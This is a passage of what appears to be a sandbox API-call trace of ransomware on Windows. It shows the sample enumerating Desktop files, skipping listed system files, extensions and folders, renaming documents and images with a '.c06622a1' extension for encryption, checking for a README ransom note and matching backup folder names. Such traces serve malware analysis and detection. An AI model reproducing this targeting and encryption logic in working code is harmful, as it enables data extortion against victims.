[0156.720] wcslen (_String="spl") returned 0x3 [0156.720] _wcsicmp (_Str1="sys", _Str2="doc") returned 15 [0156.720] wcslen (_String="sys") returned 0x3 [0156.720] _wcsicmp (_Str1="theme", _Str2="doc") returned 16 [0156.720] wcslen (_String="theme") returned 0x5 [0156.720] _wcsicmp (_Str1="themepack", _Str2="doc") returned 16 [0156.720] wcslen (_String="themepack") returned 0x9 [0156.720] _wcsicmp (_Str1="wpx", _Str2="doc") returned 19 [0156.720] wcslen (_String="wpx") returned 0x3 [0156.720] _wcsicmp (_Str1="lock", _Str2="doc") returned 8 [0156.720] wcslen (_String="lock") returned 0x4 [0156.720] _wcsicmp (_Str1="key", _Str2="doc") returned 7 [0156.720] wcslen (_String="key") returned 0x3 [0156.720] _wcsicmp (_Str1="hta", _Str2="doc") returned 4 [0156.720] wcslen (_String="hta") returned 0x3 [0156.720] _wcsicmp (_Str1="msi", _Str2="doc") returned 9 [0156.720] wcslen (_String="msi") returned 0x3 [0156.721] _wcsicmp (_Str1="pdb", _Str2="doc") returned 12 [0156.721] wcslen (_String="pdb") returned 0x3 [0156.721] _wcsicmp (_Str1="sqlite", _Str2="doc") returned 15 [0156.721] wcslen (_String="sqlite") returned 0x6 [0156.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr")) returned 0x10 [0156.721] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.721] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" [0156.721] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned 0x37 [0156.721] wcscpy (in: _Dest=0x32400d0, _Source="Ue7LWDJ Xw.doc" | out: _Dest="Ue7LWDJ Xw.doc") returned="Ue7LWDJ Xw.doc" [0156.721] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\Ue7LWDJ Xw.doc", dwFileAttributes=0x80) returned 1 [0156.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\Ue7LWDJ Xw.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\ue7lwdj xw.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0156.722] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.722] ReadFile (in: hFile=0x1d0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.722] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x1715f4bc [0156.722] RtlComputeCrc32 (PartialCrc=0xf4bc, Buffer=0x32e9a4, Length=0x80) returned 0x372c431b [0156.722] RtlComputeCrc32 (PartialCrc=0x431b, Buffer=0x32e9a4, Length=0x80) returned 0x71166d75 [0156.723] RtlComputeCrc32 (PartialCrc=0x6d75, Buffer=0x32e9a4, Length=0x80) returned 0x1192dabf [0156.723] RtlComputeCrc32 (PartialCrc=0xdabf, Buffer=0x32e9a4, Length=0x80) returned 0xbf08a3a0 [0156.723] CloseHandle (hObject=0x1d0) returned 1 [0156.723] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.723] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\Ue7LWDJ Xw.doc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\Ue7LWDJ Xw.doc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\Ue7LWDJ Xw.doc" [0156.723] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\Ue7LWDJ Xw.doc") returned 0x46 [0156.723] wcscpy (in: _Dest=0x32500f4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.723] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\Ue7LWDJ Xw.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\ue7lwdj xw.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\Ue7LWDJ Xw.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\ue7lwdj xw.doc.c06622a1"), dwFlags=0x8) returned 1 [0156.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\Ue7LWDJ Xw.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\ue7lwdj xw.doc.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0156.725] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.725] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0156.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7590acb4 [0156.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1c38e35c [0156.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2fb287c3 [0156.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd413e2 [0156.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x38213e7f [0156.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1316146 [0156.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xcb8d557 [0156.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5bbcd7b0 [0156.735] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x3c47b9ec [0156.735] RtlComputeCrc32 (PartialCrc=0xb9ec, Buffer=0x2b70094, Length=0x80) returned 0xd9f6b298 [0156.735] RtlComputeCrc32 (PartialCrc=0xb298, Buffer=0x2b70094, Length=0x80) returned 0xb098fb [0156.735] RtlComputeCrc32 (PartialCrc=0x98fb, Buffer=0x2b70094, Length=0x80) returned 0xda3ad37e [0156.735] RtlComputeCrc32 (PartialCrc=0xd37e, Buffer=0x2b70094, Length=0x80) returned 0x56d3fcd1 [0156.735] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0156.735] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.735] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.735] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e660180, ftCreationTime.dwHighDateTime=0x1d5e022, ftLastAccessTime.dwLowDateTime=0x10b69ae0, ftLastAccessTime.dwHighDateTime=0x1d5e263, ftLastWriteTime.dwLowDateTime=0x10b69ae0, ftLastWriteTime.dwHighDateTime=0x1d5e263, nFileSizeHigh=0x0, nFileSizeLow=0x183d, dwReserved0=0x0, dwReserved1=0x0, cFileName="vNMxUE.png", cAlternateFileName="")) returned 1 [0156.736] _wcsicmp (_Str1="vNMxUE.png", _Str2="README.c06622a1.TXT") returned 4 [0156.736] wcsstr (_Str="vNMxUE.png", _SubStr="README") returned 0x0 [0156.736] _wcsicmp (_Str1="autorun.inf", _Str2="vNMxUE.png") returned -21 [0156.736] wcslen (_String="autorun.inf") returned 0xb [0156.736] _wcsicmp (_Str1="boot.ini", _Str2="vNMxUE.png") returned -20 [0156.736] wcslen (_String="boot.ini") returned 0x8 [0156.736] _wcsicmp (_Str1="bootfont.bin", _Str2="vNMxUE.png") returned -20 [0156.736] wcslen (_String="bootfont.bin") returned 0xc [0156.736] _wcsicmp (_Str1="bootsect.bak", _Str2="vNMxUE.png") returned -20 [0156.736] wcslen (_String="bootsect.bak") returned 0xc [0156.736] _wcsicmp (_Str1="desktop.ini", _Str2="vNMxUE.png") returned -18 [0156.736] wcslen (_String="desktop.ini") returned 0xb [0156.736] _wcsicmp (_Str1="iconcache.db", _Str2="vNMxUE.png") returned -13 [0156.736] wcslen (_String="iconcache.db") returned 0xc [0156.736] _wcsicmp (_Str1="ntldr", _Str2="vNMxUE.png") returned -8 [0156.736] wcslen (_String="ntldr") returned 0x5 [0156.736] _wcsicmp (_Str1="ntuser.dat", _Str2="vNMxUE.png") returned -8 [0156.736] wcslen (_String="ntuser.dat") returned 0xa [0156.736] _wcsicmp (_Str1="ntuser.dat.log", _Str2="vNMxUE.png") returned -8 [0156.736] wcslen (_String="ntuser.dat.log") returned 0xe [0156.736] _wcsicmp (_Str1="ntuser.ini", _Str2="vNMxUE.png") returned -8 [0156.736] wcslen (_String="ntuser.ini") returned 0xa [0156.736] _wcsicmp (_Str1="thumbs.db", _Str2="vNMxUE.png") returned -2 [0156.736] wcslen (_String="thumbs.db") returned 0x9 [0156.736] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0156.736] wcslen (_String="386") returned 0x3 [0156.736] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0156.736] wcslen (_String="adv") returned 0x3 [0156.737] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0156.737] wcslen (_String="ani") returned 0x3 [0156.737] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0156.737] wcslen (_String="bat") returned 0x3 [0156.737] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0156.737] wcslen (_String="bin") returned 0x3 [0156.737] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0156.737] wcslen (_String="cab") returned 0x3 [0156.737] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0156.737] wcslen (_String="cmd") returned 0x3 [0156.737] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0156.737] wcslen (_String="com") returned 0x3 [0156.737] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0156.737] wcslen (_String="cpl") returned 0x3 [0156.737] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0156.737] wcslen (_String="cur") returned 0x3 [0156.737] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0156.737] wcslen (_String="deskthemepack") returned 0xd [0156.737] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0156.737] wcslen (_String="diagcab") returned 0x7 [0156.737] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0156.737] wcslen (_String="diagcfg") returned 0x7 [0156.737] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0156.737] wcslen (_String="diagpkg") returned 0x7 [0156.737] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0156.737] wcslen (_String="dll") returned 0x3 [0156.737] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0156.737] wcslen (_String="drv") returned 0x3 [0156.737] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0156.737] wcslen (_String="exe") returned 0x3 [0156.737] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0156.737] wcslen (_String="hlp") returned 0x3 [0156.737] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0156.738] wcslen (_String="icl") returned 0x3 [0156.738] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0156.738] wcslen (_String="icns") returned 0x4 [0156.738] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0156.738] wcslen (_String="ico") returned 0x3 [0156.738] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0156.738] wcslen (_String="ics") returned 0x3 [0156.738] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0156.738] wcslen (_String="idx") returned 0x3 [0156.738] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0156.738] wcslen (_String="ldf") returned 0x3 [0156.738] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0156.738] wcslen (_String="lnk") returned 0x3 [0156.738] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0156.738] wcslen (_String="mod") returned 0x3 [0156.738] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0156.738] wcslen (_String="mpa") returned 0x3 [0156.738] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0156.738] wcslen (_String="msc") returned 0x3 [0156.738] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0156.738] wcslen (_String="msp") returned 0x3 [0156.738] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0156.738] wcslen (_String="msstyles") returned 0x8 [0156.738] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0156.738] wcslen (_String="msu") returned 0x3 [0156.738] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0156.738] wcslen (_String="nls") returned 0x3 [0156.738] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0156.738] wcslen (_String="nomedia") returned 0x7 [0156.738] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0156.738] wcslen (_String="ocx") returned 0x3 [0156.739] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0156.739] wcslen (_String="prf") returned 0x3 [0156.739] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0156.739] wcslen (_String="ps1") returned 0x3 [0156.739] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0156.739] wcslen (_String="rom") returned 0x3 [0156.739] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0156.739] wcslen (_String="rtp") returned 0x3 [0156.739] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0156.739] wcslen (_String="scr") returned 0x3 [0156.739] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0156.739] wcslen (_String="shs") returned 0x3 [0156.739] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0156.739] wcslen (_String="spl") returned 0x3 [0156.739] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0156.739] wcslen (_String="sys") returned 0x3 [0156.739] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0156.739] wcslen (_String="theme") returned 0x5 [0156.739] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0156.739] wcslen (_String="themepack") returned 0x9 [0156.739] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0156.739] wcslen (_String="wpx") returned 0x3 [0156.739] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0156.739] wcslen (_String="lock") returned 0x4 [0156.739] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0156.739] wcslen (_String="key") returned 0x3 [0156.739] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0156.739] wcslen (_String="hta") returned 0x3 [0156.739] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0156.739] wcslen (_String="msi") returned 0x3 [0156.739] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0156.739] wcslen (_String="pdb") returned 0x3 [0156.740] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0156.740] wcslen (_String="sqlite") returned 0x6 [0156.740] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr")) returned 0x10 [0156.740] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.740] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" [0156.740] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned 0x37 [0156.740] wcscpy (in: _Dest=0x32400d0, _Source="vNMxUE.png" | out: _Dest="vNMxUE.png") returned="vNMxUE.png" [0156.740] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\vNMxUE.png", dwFileAttributes=0x80) returned 1 [0156.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\vNMxUE.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\vnmxue.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0156.740] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.740] ReadFile (in: hFile=0x1bc, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.741] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x16bc148b [0156.741] RtlComputeCrc32 (PartialCrc=0x148b, Buffer=0x32e9a4, Length=0x80) returned 0x50612f1d [0156.741] RtlComputeCrc32 (PartialCrc=0x2f1d, Buffer=0x32e9a4, Length=0x80) returned 0x2425ca0c [0156.741] RtlComputeCrc32 (PartialCrc=0xca0c, Buffer=0x32e9a4, Length=0x80) returned 0x5074e4ea [0156.741] RtlComputeCrc32 (PartialCrc=0xe4ea, Buffer=0x32e9a4, Length=0x80) returned 0xe1a934ef [0156.741] CloseHandle (hObject=0x1bc) returned 1 [0156.741] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.742] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\vNMxUE.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\vNMxUE.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\vNMxUE.png" [0156.742] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\vNMxUE.png") returned 0x42 [0156.742] wcscpy (in: _Dest=0x32500ec, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.742] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\vNMxUE.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\vnmxue.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\vNMxUE.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\vnmxue.png.c06622a1"), dwFlags=0x8) returned 1 [0156.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\vNMxUE.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\vnmxue.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1bc [0156.744] CreateIoCompletionPort (FileHandle=0x1bc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.744] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0156.751] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4bbc48a4 [0156.751] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5089ffaf [0156.752] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x15dc795d [0156.752] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x21043f81 [0156.752] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d5982ca [0156.752] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x53a876ee [0156.752] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x47e7a895 [0156.752] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x45cf90bf [0156.755] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0x86aa17af [0156.755] RtlComputeCrc32 (PartialCrc=0x17af, Buffer=0x3480094, Length=0x80) returned 0x8a189afd [0156.755] RtlComputeCrc32 (PartialCrc=0x9afd, Buffer=0x3480094, Length=0x80) returned 0x5c8d7006 [0156.755] RtlComputeCrc32 (PartialCrc=0x7006, Buffer=0x3480094, Length=0x80) returned 0x6279c670 [0156.755] RtlComputeCrc32 (PartialCrc=0xc670, Buffer=0x3480094, Length=0x80) returned 0x6a3c9891 [0156.755] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0156.755] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.755] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.755] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.755] FindClose (in: hFindFile=0x17c1d0 | out: hFindFile=0x17c1d0) returned 1 [0156.756] _wcsicmp (_Str1="backup", _Str2="ZIqq01CnHJJwR") returned -24 [0156.756] wcslen (_String="backup") returned 0x6 [0156.756] _wcsicmp (_Str1="bak", _Str2="ZIqq01CnHJJwR") returned -24 [0156.756] wcslen (_String="bak") returned 0x3 [0156.756] _wcsicmp (_Str1="back", _Str2="ZIqq01CnHJJwR") returned -24 [0156.756] wcslen (_String="back") returned 0x4 [0156.756] _wcsicmp (_Str1="archive", _Str2="ZIqq01CnHJJwR") returned -25 [0156.756] wcslen (_String="archive") returned 0x7 [0156.756] _wcsicmp (_Str1="bckp", _Str2="ZIqq01CnHJJwR") returned -24 [0156.756] wcslen (_String="bckp") returned 0x4 [0156.756] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.758] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.758] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc60574c0, ftCreationTime.dwHighDateTime=0x1d5dac0, ftLastAccessTime.dwLowDateTime=0xc7fd2c00, ftLastAccessTime.dwHighDateTime=0x1d5db42, ftLastWriteTime.dwLowDateTime=0xc7fd2c00, ftLastWriteTime.dwHighDateTime=0x1d5db42, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zNgiUMtwIx", cAlternateFileName="ZNGIUM~1")) returned 1 [0156.758] _wcsicmp (_Str1="$recycle.bin", _Str2="zNgiUMtwIx") returned -86 [0156.758] wcslen (_String="$recycle.bin") returned 0xc [0156.758] _wcsicmp (_Str1="config.msi", _Str2="zNgiUMtwIx") returned -23 [0156.758] wcslen (_String="config.msi") returned 0xa [0156.758] _wcsicmp (_Str1="$windows.~bt", _Str2="zNgiUMtwIx") returned -86 [0156.758] wcslen (_String="$windows.~bt") returned 0xc [0156.758] _wcsicmp (_Str1="$windows.~ws", _Str2="zNgiUMtwIx") returned -86 [0156.758] wcslen (_String="$windows.~ws") returned 0xc [0156.758] _wcsicmp (_Str1="windows", _Str2="zNgiUMtwIx") returned -3 [0156.758] wcslen (_String="windows") returned 0x7 [0156.758] _wcsicmp (_Str1="appdata", _Str2="zNgiUMtwIx") returned -25 [0156.758] wcslen (_String="appdata") returned 0x7 [0156.758] _wcsicmp (_Str1="application data", _Str2="zNgiUMtwIx") returned -25 [0156.758] wcslen (_String="application data") returned 0x10 [0156.758] _wcsicmp (_Str1="boot", _Str2="zNgiUMtwIx") returned -24 [0156.758] wcslen (_String="boot") returned 0x4 [0156.758] _wcsicmp (_Str1="google", _Str2="zNgiUMtwIx") returned -19 [0156.758] wcslen (_String="google") returned 0x6 [0156.758] _wcsicmp (_Str1="mozilla", _Str2="zNgiUMtwIx") returned -13 [0156.758] wcslen (_String="mozilla") returned 0x7 [0156.758] _wcsicmp (_Str1="program files", _Str2="zNgiUMtwIx") returned -10 [0156.759] wcslen (_String="program files") returned 0xd [0156.759] _wcsicmp (_Str1="program files (x86)", _Str2="zNgiUMtwIx") returned -10 [0156.759] wcslen (_String="program files (x86)") returned 0x13 [0156.759] _wcsicmp (_Str1="programdata", _Str2="zNgiUMtwIx") returned -10 [0156.759] wcslen (_String="programdata") returned 0xb [0156.759] _wcsicmp (_Str1="system volume information", _Str2="zNgiUMtwIx") returned -7 [0156.759] wcslen (_String="system volume information") returned 0x19 [0156.759] _wcsicmp (_Str1="tor browser", _Str2="zNgiUMtwIx") returned -6 [0156.759] wcslen (_String="tor browser") returned 0xb [0156.759] _wcsicmp (_Str1="windows.old", _Str2="zNgiUMtwIx") returned -3 [0156.759] wcslen (_String="windows.old") returned 0xb [0156.759] _wcsicmp (_Str1="intel", _Str2="zNgiUMtwIx") returned -17 [0156.759] wcslen (_String="intel") returned 0x5 [0156.759] _wcsicmp (_Str1="msocache", _Str2="zNgiUMtwIx") returned -13 [0156.759] wcslen (_String="msocache") returned 0x8 [0156.759] _wcsicmp (_Str1="perflogs", _Str2="zNgiUMtwIx") returned -10 [0156.759] wcslen (_String="perflogs") returned 0x8 [0156.759] _wcsicmp (_Str1="x64dbg", _Str2="zNgiUMtwIx") returned -2 [0156.759] wcslen (_String="x64dbg") returned 0x6 [0156.759] _wcsicmp (_Str1="public", _Str2="zNgiUMtwIx") returned -10 [0156.759] wcslen (_String="public") returned 0x6 [0156.759] _wcsicmp (_Str1="all users", _Str2="zNgiUMtwIx") returned -25 [0156.759] wcslen (_String="all users") returned 0x9 [0156.759] _wcsicmp (_Str1="default", _Str2="zNgiUMtwIx") returned -22 [0156.759] wcslen (_String="default") returned 0x7 [0156.759] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" [0156.759] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned 0x2b [0156.759] wcscpy (in: _Dest=0x32200a4, _Source="zNgiUMtwIx" | out: _Dest="zNgiUMtwIx") returned="zNgiUMtwIx" 